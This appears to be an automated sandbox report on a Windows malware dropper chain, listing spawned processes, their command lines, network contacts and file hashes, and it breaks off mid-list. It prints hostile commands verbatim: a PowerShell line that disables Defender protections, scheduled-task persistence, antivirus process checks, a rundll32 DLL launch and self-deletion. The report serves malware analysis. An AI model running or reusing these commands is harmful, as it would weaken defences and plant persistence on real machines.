PID 4596 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 4596 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 4596 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 4396 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 4396 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 4396 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1356 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 1356 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 1356 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 1356 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 1356 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 1356 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 4396 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 4396 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 4396 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 2368 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 2368 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 2368 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 4544 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 4544 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 4544 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 3140 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 3140 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 3140 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe
PID 3980 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe
PID 3980 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe
PID 3980 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe
PID 1036 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe C:\Windows\SysWOW64\cmd.exe
PID 4688 wrote to memory of 3372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4688 wrote to memory of 3372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4688 wrote to memory of 3372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3372 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3372 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3372 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3372 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3372 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3372 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3372 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3372 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3372 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3060 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Windows\SysWOW64\schtasks.exe
PID 3060 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Windows\SysWOW64\schtasks.exe
PID 3060 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Windows\SysWOW64\schtasks.exe
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3140 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\rundll32.exe
PID 3140 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\rundll32.exe
PID 3140 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\rundll32.exe
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

Processes

C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 1092

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe

"C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe"

C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe

C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe /TH_ID=_1564 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cmd < Yugoslavia

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell get-process avastui

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell get-process avgui

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^TiesHighsFridayPromisedOrganismsPromotedStronglyBannersTermExplainOrganisedPhpLastingMaritime$" Finding

C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

29190\\Bondage.exe.pif 29190\\M

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 18

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "dZVxEGlqbg" /tr "C:\Users\Admin\AppData\Roaming\claRXiEwVe\dZVxEGlqbg.exe.com C:\Users\Admin\AppData\Roaming\claRXiEwVe\H" /sc onlogon /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main

C:\ProgramData\07900588628047328197.exe

"C:\ProgramData\07900588628047328197.exe"

C:\ProgramData\46777832471797123856.exe

"C:\ProgramData\46777832471797123856.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe; Set-MpPreference -SubmitSamplesConsent NeverSend -PUAProtection Disabled

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SoJFlNPT" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDF3F.tmp"

C:\ProgramData\07900588628047328197.exe

"{path}"

C:\ProgramData\07900588628047328197.exe

"{path}"

C:\ProgramData\07900588628047328197.exe

"{path}"

C:\ProgramData\07900588628047328197.exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 20.189.173.14:443 tcp
AT 212.113.119.255:80 212.113.119.255 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 255.119.113.212.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 67.55.52.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
N/A 185.161.248.72:38452 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 KGpmZSONULDSRs.KGpmZSONULDSRs udp
US 40.125.122.176:443 tcp
N/A 185.161.248.72:38452 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 40.125.122.176:443 tcp
N/A 185.161.248.72:38452 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 168.119.169.139:131 168.119.169.139 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 139.169.119.168.in-addr.arpa udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
N/A 185.161.248.72:38452 tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 54.231.226.153:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 153.226.231.54.in-addr.arpa udp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
NL 54.192.87.164:80 ocsp.r2m01.amazontrust.com tcp
US 8.8.8.8:53 76.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 164.87.192.54.in-addr.arpa udp
US 8.8.8.8:53 208.137.222.52.in-addr.arpa udp
US 8.8.8.8:53 addons.smgsuite.com udp
US 188.114.96.0:443 addons.smgsuite.com tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 smgsuite.com udp
US 188.114.97.0:443 smgsuite.com tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
N/A 185.161.248.72:38452 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

MD5 cb7724f0cfbc465a48b1832d3419edd7
SHA1 f8553bffe63bbc454ef98c6c1ec3736b9e0a81aa
SHA256 0a77eec7259fe2048bd127f7be7af966085f73415221dd04457713348393b940
SHA512 f646e478eacb637adb358d6d3a367259de84b078465656a77f62e9d0b7443589ddfd79138730ae317649d0a1cc2b7b89a5d0c30b7f083c25671dd57c6881e933

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

MD5 2c370254d2b62b9fa0a22d82556bb9db
SHA1 98dd76e9e34d752e6110a70e514f8dc94e914ebd
SHA256 ecbed5e995e73dd69c417d6a3a422f3c93d1149c6a8acbed56f181535208463b
SHA512 9d0aab28dd1c4865053fd9995ded31ca14da398d2c407b46253f10abe079159fb9cace32312e25402463a24b727930db0edefebe5b8da9d57ac4493603845843

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

MD5 2013df3ab4c393dbfeb56100e4c414a6
SHA1 1a0e09673ca2c1e3bfd7b5ed5e03cead327f3ac2
SHA256 1081bd699d986ef6b0fc0d99c1dbb1c26bdfacc89249078e611c3cba538bd878
SHA512 7bd1d58142e9b9346096b297fa286f1bf7f161e246caa27774255e91416357de9b481675fc9f63430b2dd399758521166130e7f3ce590bfc2462a3e28d0b15fb

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

MD5 6bb86793dc581b29147c2d4d5bad8ce6
SHA1 c5ffe67ea0f190d661779969a5da2b843e9eaf6d
SHA256 ccf25cf1cb0269655e2003b30ed9fdc3d0225bb49b91bc301978e809bcf517bd
SHA512 376e2188605a7c9f9d69a01960b2ff2554060adc7b254ba5c827be86b3e100b628abe281231d09d29e85ba8230f2f08be4d41b0a035da6914bfeec8994559d52

memory/3896-161-0x0000000002350000-0x0000000002360000-memory.dmp

memory/3896-162-0x0000000002350000-0x0000000002360000-memory.dmp

memory/3896-163-0x0000000002350000-0x0000000002360000-memory.dmp

memory/3896-164-0x00000000049C0000-0x0000000004F64000-memory.dmp

memory/3896-165-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-166-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-168-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-170-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-172-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-174-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-176-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-178-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-180-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-182-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-184-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-192-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-190-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-188-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-186-0x0000000002360000-0x0000000002373000-memory.dmp

memory/3896-193-0x0000000002350000-0x0000000002360000-memory.dmp

memory/3896-194-0x0000000002350000-0x0000000002360000-memory.dmp

memory/3896-195-0x0000000002350000-0x0000000002360000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

memory/3932-201-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-202-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-204-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-206-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-208-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-210-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-212-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-214-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-216-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-218-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-220-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-222-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-224-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-226-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-228-0x00000000023A0000-0x00000000023B2000-memory.dmp

memory/3932-229-0x00000000005E0000-0x000000000060D000-memory.dmp

memory/3932-230-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

memory/3932-231-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

memory/3932-232-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

memory/3932-233-0x0000000000400000-0x0000000000466000-memory.dmp

memory/3932-235-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

memory/3932-236-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

memory/3932-237-0x0000000000400000-0x0000000000466000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
